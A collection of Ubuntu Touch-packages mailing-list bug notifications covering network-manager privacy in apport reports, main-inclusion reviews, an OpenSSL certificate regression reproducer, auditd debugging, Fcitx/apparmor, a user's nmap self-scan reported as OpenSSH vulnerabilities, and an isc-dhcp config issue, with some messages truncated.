** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/2046633 Title: Don't include 'nmcli -f all con' output in bug report (for privacy) Status in network-manager package in Ubuntu: New Bug description: The apport bug reporting hooks for this package (/usr/share/apport/package/hooks/source_network-manager{,-applet}.py) include the output of `nmcli -f all con`. This lists all wifi SSIDs that the user has ever connected to, and the date of last connection. I think this is a privacy problem, as it tends to reveal the user's recent whereabouts, and it's posted publicly on launchpad. (Imagine for instance an entry for "LoveMotelGuestWifi" at a time when the user had said they were at the office...) It is disclosed to the user before the report is sent, but only if they think to expand that item in the "Send / Don't send" dialog (which is not descriptively labeled), and there is no way to opt out of it. You can delete it manually from launchpad afterward, which is what I am going to do with this bug report, but I doubt most people would know to do that. This info should probably not be included at all, or if it is, it should be sanitized. Also, it might be a good idea to purge launchpad of all such files. (Marking this as "security" in case you consider this kind of a privacy leak to be something the security team should handle. If not, feel free to demote it to an ordinary bug.) 
ProblemType: Bug DistroRelease: Ubuntu 23.10 Package: network-manager 1.44.2-1ubuntu1.2 ProcVersionSignature: Ubuntu 6.5.0-14.14-generic 6.5.3 Uname: Linux 6.5.0-14-generic x86_64 ApportVersion: 2.27.0-0ubuntu5 Architecture: amd64 CasperMD5CheckResult: unknown Date: Sat Dec 16 14:38:45 2023 IfupdownConfig: # interfaces(5) file used by ifup(8) and ifdown(8) auto lo iface lo inet loopback InstallationDate: Installed on 2019-06-03 (1657 days ago) InstallationMedia: Ubuntu 19.04 "Disco Dingo" - Release amd64 (20190416) IpRoute: default via 192.168.1.13 dev enxa0cec8c4f782 proto dhcp src 192.168.1.60 metric 100 169.254.0.0/16 dev virbr0 scope link metric 1000 linkdown 172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown 192.168.1.0/24 dev enxa0cec8c4f782 proto kernel scope link src 192.168.1.60 metric 100 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 linkdown ProcEnviron: LANG=en_US.UTF-8 PATH=(custom, no user) SHELL=/bin/bash TERM=xterm-256color XDG_RUNTIME_DIR= SourcePackage: network-manager UpgradeStatus: Upgraded to mantic on 2023-12-14 (3 days ago) modified.conffile..etc.default.apport: # set this to 0 to disable apport, or to 1 to enable it # you can temporarily override this with # sudo service apport start force_start=1 enabled=0 mtime.conffile..etc.default.apport: 2020-08-04T11:07:36.415303 nmcli-nm: RUNNING VERSION STATE STARTUP CONNECTIVITY NETWORKING WIFI-HW WIFI WWAN-HW WWAN running 1.44.2 connected started full enabled enabled enabled missing enabled To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/2046633/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1892559] Re: [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite
Thanks Marco, I'll take pam-pkcs11 off our todo list. (This can be reversed, of course. If it turns out to be necessary for something, someone shout. :) Thanks ** Changed in: pam-pkcs11 (Ubuntu) Status: New => Invalid ** Changed in: pam-pkcs11 (Ubuntu) Assignee: Ubuntu Security Team (ubuntu-security) => (unassigned) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pcsc-lite in Ubuntu. https://bugs.launchpad.net/bugs/1892559 Title: [MIR] ccid libpam-pkcs1 libpcsc-perl opensc pcsc-tools pcsc-lite Status in ccid package in Ubuntu: New Status in opensc package in Ubuntu: Incomplete Status in pam-pkcs11 package in Ubuntu: Invalid Status in pcsc-lite package in Ubuntu: New Status in pcsc-perl package in Ubuntu: Invalid Status in pcsc-tools package in Ubuntu: Invalid Bug description: ==> ccid <== [Availability] ccid is in universe, and builds on all architectures. [Rationale] The desktop team and security team are interested in bringing smartcard authentication to enterprise desktop environments. [Security] No CVEs for ccid are listed in our database. Doesn't appear to bind to a socket. No privileged executables, but does have udev rules. Probably needs a security review. [Quality assurance] No test suite. Does require odd hardware that we'll probably need to buy. I don't see debconf questions. ccid is well maintained in Debian by upstream author. One open wishlist bug in BTS, harmless. One open bug in launchpad, not security, but looks very frustrating for the users. The upstream author was engaged but it never reached resolution. https://bugs.launchpad.net/ubuntu/+source/ccid/+bug/1175465 Has a debian/watch file. Quilt packaging. 
P: ccid source: no-dep5-copyright P: ccid source: package-uses-experimental-debhelper-compat-version 13 [Dependencies] Minimal dependencies, in main [Standards compliance] Appears to satisfy FHS and Debian policy [Maintenance] The desktop team will subscribe to bugs, however it is expected that the security team will assist with security-relevant questions. [Background information] ccid provides drivers to interact with usb-connected smart card readers. ==> libpam-pkcs11 <== [Availability] Source package pam-pkcs11 is in universe and builds on all architectures. [Rationale] The desktop team and security team are interested in bringing smartcard authentication to enterprise desktop environments. [Security] No CVEs in our database. Doesn't appear to bind to sockets. No privileged executables (but is a PAM module). As a PAM module this will require a security review. [Quality assurance] The package does not call pam-auth-update in its postinst #1650366 Does not ask questions during install. One Ubuntu bug claims very poor behaviour if a card isn't plugged in. No Debian bugs. Occasional updates in Debian by long-term maintainer. Does require odd hardware that we'll probably need to buy. Does not appear to run tests during build. Has scary warnings in the build logs. Has a debian/watch file. Ancient standards version; other smaller lintian messages, mostly documentation problems. Quilt packaging. [Dependencies] Depends on libcurl4, libldap-2.4-2, libpam0g, libpcsclite1, libssl1.1 All are in main. [Standards compliance] The package does not call pam-auth-update in its postinst #1650366 Otherwise looks to conform to FHS and Debian policies [Maintenance] The desktop team will subscribe to bugs, however it is expected that the security team will assist with security-relevant questions. [Background information] This PAM module can use CRLs and full-chain verification of certificates. It can also do LDAP, AD, and Kerberos username mapping. 
==> libpcsc-perl <== [Availability] Source package pcsc-perl is in universe, builds for all architectures, plus i386 [Rationale] The desktop team and security team are interested in bringing smartcard authentication to enterprise desktop environments. [Security] There are no cves for pcsc-perl in our database. No privileged executables. Doesn't appear to bind to sockets. Probably needs a security review. [Quality assurance] Library package not intended to be used directly. No debconf questions. No bugs in Debian. No bugs in Ubuntu. Does require odd hardware that we'll probably need to buy. Tests exist, not run during the build; probably can't run during the build. Includes debian/watch file. A handful of lintian issues Quilt packaging. [Dependencies] libpcsc-perl depends upon libpcsclite1, libc6, perl, perlapi-5.30.0. All are in main. [Standards compliance] One oddity, Card.pod is stored in /usr/lib/x86_64-linux-gnu/perl5/5.30/Chipcard/PCSC/ Many other perl packages have .pod files in these directory trees so maybe it's fine, but it seems
[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs
Hello Dan and Matthew, thanks for working on this. I gave the debdiffs a look, skimmed through openssl changes, and don't see any reason to not do this. There *are* larger changes to that function in https://github.com/openssl/openssl/commit/1e41dadfa7b9f792ed0f4714a3d3d36f070cf30e -- but it's a fairly invasive change, and I'm not recommending or suggesting we take it instead. It'd be nice though if someone could double-check the certs in question against a build that uses this newer commit and make sure that we're not backporting a very short-lived functional change. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1926254 Title: x509 Certificate verification fails when basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs Status in openssl package in Ubuntu: Fix Released Status in openssl source package in Focal: In Progress Status in openssl source package in Groovy: In Progress Status in openssl source package in Hirsute: Fix Released Bug description: [Impact] In openssl 1.1.1f, the below commit was merged: commit ba4356ae4002a04e28642da60c551877eea804f7 Author: Bernd Edlinger Date: Sat Jan 4 15:54:53 2020 +0100 Subject: Fix error handling in x509v3_cache_extensions and related functions Link: https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7 This introduced a regression which caused certificate validation to fail when certificates violate RFC 5280 [1], namely, when a certificate has "basicConstraints=CA:FALSE,pathlen:0". This combination is commonly seen by self-signed leaf certificates with an intermediate CA before the root CA. Because of this, openssl 1.1.1f rejects these certificates and they cannot be used in the system certificate store, and ssl connections fail when you try to use them to connect to a ssl endpoint. 
The error you see when you try verify is: $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem error 20 at 0 depth lookup: unable to get local issuer certificate error user1_cert.pem: verification failed The exact same certificates work fine on Xenial, Bionic and Hirsute. [1] https://tools.ietf.org/html/rfc5280.html [Testcase] We will create our own root CA, intermediate CA and leaf server certificate. Create necessary directories: $ mkdir reproducer $ cd reproducer $ mkdir CA Write openssl configuration files to disk for each CA and cert: $ cat << EOF >> rootCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Root-CA [ usr_cert ] basicConstraints= critical,CA:TRUE keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> subCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Sub-CA [ usr_cert ] basicConstraints= critical,CA:TRUE,pathlen:0 keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> user.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test User [ usr_cert ] basicConstraints= critical,CA:FALSE,pathlen:0 keyUsage= critical,digitalSignature,keyAgreement extendedKeyUsage= clientAuth,serverAuth subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF Then generate the necessary RSA keys and form certificates: $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes -x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt rsa_padding_mode:pss -sigopt 
rsa_pss_saltlen:-1 $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt -CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 4380 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ c_rehash CA $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem -sigopt rsa_paddin
[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs
Matthew, thanks so much! sounds good to me. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1926254 Title: x509 Certificate verification fails when basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs Status in openssl package in Ubuntu: Fix Released Status in openssl source package in Focal: In Progress Status in openssl source package in Groovy: In Progress Status in openssl source package in Hirsute: Fix Released Bug description: [Impact] In openssl 1.1.1f, the below commit was merged: commit ba4356ae4002a04e28642da60c551877eea804f7 Author: Bernd Edlinger Date: Sat Jan 4 15:54:53 2020 +0100 Subject: Fix error handling in x509v3_cache_extensions and related functions Link: https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7 This introduced a regression which caused certificate validation to fail when certificates violate RFC 5280 [1], namely, when a certificate has "basicConstraints=CA:FALSE,pathlen:0". This combination is commonly seen by self-signed leaf certificates with an intermediate CA before the root CA. Because of this, openssl 1.1.1f rejects these certificates and they cannot be used in the system certificate store, and ssl connections fail when you try to use them to connect to a ssl endpoint. The error you see when you try verify is: $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem error 20 at 0 depth lookup: unable to get local issuer certificate error user1_cert.pem: verification failed The exact same certificates work fine on Xenial, Bionic and Hirsute. [1] https://tools.ietf.org/html/rfc5280.html [Testcase] We will create our own root CA, intermediate CA and leaf server certificate. 
Create necessary directories: $ mkdir reproducer $ cd reproducer $ mkdir CA Write openssl configuration files to disk for each CA and cert: $ cat << EOF >> rootCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Root-CA [ usr_cert ] basicConstraints= critical,CA:TRUE keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> subCA.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test RSA PSS Sub-CA [ usr_cert ] basicConstraints= critical,CA:TRUE,pathlen:0 keyUsage= critical,keyCertSign,cRLSign subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF $ cat << EOF >> user.cnf [ req ] prompt = no distinguished_name = req_distinguished_name x509_extensions = usr_cert [ req_distinguished_name ] C = DE O = Test Org CN = Test User [ usr_cert ] basicConstraints= critical,CA:FALSE,pathlen:0 keyUsage= critical,digitalSignature,keyAgreement extendedKeyUsage= clientAuth,serverAuth subjectKeyIdentifier= hash authorityKeyIdentifier = keyid:always EOF Then generate the necessary RSA keys and form certificates: $ openssl genpkey -algorithm RSA-PSS -out rootCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config rootCA.cnf -set_serial 01 -new -batch -sha256 -nodes -x509 -days 9125 -out CA/rootCA_cert.pem -key rootCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl genpkey -algorithm RSA-PSS -out subCA_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config subCA.cnf -new -out subCA_req.pem -key subCA_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl x509 -req -sha256 -in subCA_req.pem -CA CA/rootCA_cert.pem -CAkey rootCA_key.pem -out CA/subCA_cert.pem -CAserial rootCA_serial.txt -CAcreateserial -extfile subCA.cnf -extensions usr_cert -days 
4380 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ c_rehash CA $ openssl genpkey -algorithm RSA-PSS -out user1_key.pem -pkeyopt rsa_keygen_bits:2048 $ openssl req -config user.cnf -new -out user1_req.pem -key user1_key.pem -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 $ openssl x509 -req -sha256 -in user1_req.pem -CA CA/subCA_cert.pem -CAkey subCA_key.pem -out user1_cert.pem -CAserial subCA_serial.txt -CAcreateserial -extfile user.cnf -extensions usr_cert -days 1825 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:-1 Now, let's try verify the generated certificates: $ openssl version OpenSSL 1.1.1f 31 Mar 2020 $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem user1_cert.pem error 20 at 0 depth lookup: unable to get
[Touch-packages] [Bug 1873627] Re: auditd fails after moving /var it a new filesystem and turning /var/run into a symlink to /run
Thanks for the strace, these looked like the 'important' parts: sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=3, pid=0}, "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}, 56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56 poll([{fd=3, events=POLLIN}], 1, 500) = 1 ([{fd=3, revents=POLLIN}]) recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242}, {error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=3, pid=0}, "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}}, 8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, [12]) = 76 recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242}, {error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=3, pid=0}, "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}}, 8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, [12]) = 76 write(2, "Error setting audit daemon pid ("..., 44Error setting audit daemon pid (File exists)) = 44 ... write(2, "The audit daemon is exiting.", 28The audit daemon is exiting.) 
= 28 write(2, "\n", 1 ) = 1 sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=4, pid=0}, "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}, 56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56 poll([{fd=3, events=POLLIN}], 1, 500) = 1 ([{fd=3, revents=POLLIN}]) recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242}, {error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=4, pid=0}, "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}}, 8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, [12]) = 76 recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242}, {error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=4, pid=0}, "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}}, 8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, [12]) = 76 write(2, "Error setting audit daemon pid ("..., 50Error setting audit daemon pid (Permission denied)) = 50 write(2, "\n", 1 ) = 1 I don't understand why it's issuing an AUDIT_SET command after it already decided to exit -- maybe it's just trying to tear itself down cleanly. I found a few cases in the kernel code for returning both file exists and permission denied: kernel/audit.c audit_netlink_ok(): /* Only support auditd and auditctl in initial pid namespace * for now. 
*/ if (task_active_pid_ns(current) != &init_pid_ns) return -EPERM; if (!netlink_capable(skb, CAP_AUDIT_CONTROL)) err = -EPERM; break; kernel/audit.c audit_receive_msg(): auditd_pid = auditd_pid_vnr(); if (auditd_pid) { /* replacing a healthy auditd is not allowed */ if (new_pid) { audit_log_config_change("audit_pid", new_pid, auditd_pid, 0); return -EEXIST; } kernel/audit.c audit_set_feature(): /* are we changing a locked feature? */ if (old_lock && (new_feature != old_feature)) { audit_log_feature_change(i, old_feature, new_feature, old_lock, new_lock, 0); return -EPERM; } Do any of these feel applicable to your environment? Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to audit in Ubuntu. https://bugs.launchpad.net/bugs/1873627 Title: auditd fails after moving /var it a new filesystem and turning /var/run into a symlink to /run Status in audit package in Ubuntu: Confirmed Bug description: Auditd was working on my system (Ubuntu 18.04LTS, kernel 4.15.0-1065-aws) until recently. But after splitting off /var into a new filesystem it fails to launch. running '/sbin/auditd -f' as root indicates a problem writing the pid file (no file exists even when it says one does) Post config load command output: Started dispatch
Re: [Touch-packages] [apparmor] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese
On Tue, May 18, 2021 at 07:39:48PM -, Gunnar Hjalmarsson wrote:
> On 2021-05-16 22:23, Gunnar Hjalmarsson wrote:
> > As regards apparmor it's possible that no change is needed.
>
> Well, I simply tested with the Chromium snap. fcitx5 does not work in
> Chromium, while fcitx4 does. So something needs to be done.

Excellent, can you paste the DENIED lines from your test into the bug report?

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1928360

Title:
  Switch to Fcitx 5 for Chinese

Status in Lubuntu default settings:
  New
Status in Ubuntu Kylin:
  New
Status in apparmor package in Ubuntu:
  New
Status in language-selector package in Ubuntu:
  In Progress

Bug description:
  In Debian 11 Fcitx 5 will be the default IM framework for Chinese on non-GNOME desktops. I can think it's time to make the equivalent changes in Ubuntu 21.10 as well.

  I'd appreciate input on the topic from the Ubuntu Kylin team as well as other Chinese speaking users.
[Touch-packages] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese
Gunnar, indeed, it had much less in it than I expected; I don't know much about the snap packaging for Chromium, but it looked to me like it was trying to do bluetooth things and that's all that was denied. I'm no fcitx expert but I didn't think it looked related.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1928360

Title:
  Switch to Fcitx 5 for Chinese

Status in Lubuntu default settings:
  New
Status in Ubuntu Kylin:
  In Progress
Status in apparmor package in Ubuntu:
  New
Status in language-selector package in Ubuntu:
  Fix Released

Bug description:
  In Debian 11 Fcitx 5 will be the default IM framework for Chinese on non-GNOME desktops. I can think it's time to make the equivalent changes in Ubuntu 21.10 as well.

  I'd appreciate input on the topic from the Ubuntu Kylin team as well as other Chinese speaking users.
[Touch-packages] [Bug 1152187] Re: [MIR] systemd
The usual way we determine if a package is in main or not is to check the package lists; will the promotion step make the systemd-container binary package visible to package lists or rmadison output?

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1152187

Title:
  [MIR] systemd

Status in systemd package in Ubuntu:
  Fix Released
Status in systemd source package in Bionic:
  Incomplete

Bug description:
  * The package is in universe and built on all archs:
  https://launchpad.net/ubuntu/+source/systemd/44-10ubuntu1

  * Rationale:
  - in a first step we want systemd-services promoted to replace ubuntu-system-services
  - We will also want to move from consolekit to logind soon (https://blueprints.launchpad.net/ubuntu/+spec/foundations-1303-consolekit-logind-migration)
  - udev has been merged in the systemd source upstream so we will want to build it from there at some point as well

  we don't plan to use the systemd init system at this point

  * Security: there has been some security issues in the past
  http://secunia.com/advisories/search/?search=systemd
  http://secunia.com/advisories/48220/
  http://secunia.com/advisories/48208/
  http://secunia.com/advisories/48331/

  Those are mostly logind issue and have been fixed upstream. Our current package is outdated but we do plan to update it before starting using logind. There should be no issue with the services

  * Quality:
  - there is no RC bug in debian: http://bugs.debian.org/cgi-bin/pkgreport.cgi?repeatmerged=no&src=systemd
  - there is no bug open in launchpad: https://launchpad.net/ubuntu/+source/systemd/+bugs
  - upstream is active and responsive to issues

  The desktop bugs team is subscribed to the package in launchpad, foundations/desktop will maintain the package and look to the bug reports regularly.
[Touch-packages] [Bug 1929758] Re: OpenSSH vulnerabilities
Great, thanks Ian. ** Package changed: ubuntu => openssh (Ubuntu) ** Changed in: openssh (Ubuntu) Status: Incomplete => Invalid ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1929758 Title: OpenSSH vulnerabilities Status in openssh package in Ubuntu: Invalid Bug description: Hi, I was using NMAP to scan my Ubuntu server and it listed some vulnerabilities in OpenSSH. It also came up with exploits against these vulnerabilities. On my home network, I have several computers that I use for various purposes; a Ubuntu 20.04 LTS computer and Kali Linux computer being the subject for this email. I wanted to test if I had any security issues on my Ubuntu computer so I was doing some scans on it from my Kali computer. I did a scan with NMAP and it produced some vulnerabilities in OpenSSH and what exploits to use. Here is some info on my computers and the NMAP command that I used: ~$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.2 LTS Release: 20.04 Codename: focal ─$ lsb_release -a No LSB modules are available. 
Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2021.1 Codename: kali-rolling ~$ ssh -V OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020 ~$ apt-cache policy ssh ssh: Installed: (none) Candidate: 1:8.2p1-4ubuntu0.2 Version table: 1:8.2p1-4ubuntu0.2 500 500 http://ca.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages 500 http://ca.archive.ubuntu.com/ubuntu focal-security/main amd64 Packages 1:8.2p1-4 500 500 http://ca.archive.ubuntu.com/ubuntu focal/main amd64 Packages ─$ sudo nmap -sV --script vuln 192.168.0.10 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:26 PDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.0.10 Host is up (0.00017s latency). Not shown: 995 filtered ports PORTSTATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp closed ftp 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.2p1: | EDB-ID:2101810.0 https://vulners.com/exploitdb/EDB-ID:21018 *EXPLOIT* | CVE-2001-0554 10.0https://vulners.com/cve/CVE-2001-0554 | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT* | 
MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT* | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 |_MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/0.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/ *EXPLOIT* 80/tcp open http Apache httpd |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Apache |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 443/tcp open ssl/http Apache httpd |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Apache |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_sslv2-drown: MAC Address: 00:15:C5:F6:5D:94 (Dell) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 80.86 seconds Thanks, Ian To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1929758/+subscriptions -- Mai
[Touch-packages] [Bug 1930103] Re: isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update
Hello Milan, I just tested an upgrade:

Unpacking isc-dhcp-server (4.4.1-2.1ubuntu5.20.04.2) over (4.4.1-2.1ubuntu5) ...

and my /etc/default/isc-dhcp-server modifications had been left in place.

The maintainer scripts will create a new one if the file cannot be read:
https://sources.debian.org/src/isc-dhcp/4.4.1-2.2/debian/isc-dhcp-server.postinst/#L33
(Debian sources, but Ubuntu's are very similar.)

Is it possible your old /etc/default/isc-dhcp-server could not be read?

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1930103

Title:
  isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  Today unattended upgrade of ISC DHCPD overwrite config file /etc/default/isc-dhcp-server and set wrong interface where daemon have to listen (eno2 instead of br0 as was set before update). I see no backup file of original config file so I had to investigate where the problem was. Update have to never overwrite config file and throw away previous version.

  /var/log/apt/history.log:
  Start-Date: 2021-05-28 06:17:41
  Commandline: /usr/bin/unattended-upgrade
  Upgrade: isc-dhcp-server:amd64 (4.4.1-2.1ubuntu5, 4.4.1-2.1ubuntu5.20.04.2)
  End-Date: 2021-05-28 06:17:47

  root@linux:~# ls -l /etc/default/isc-dhcp-server
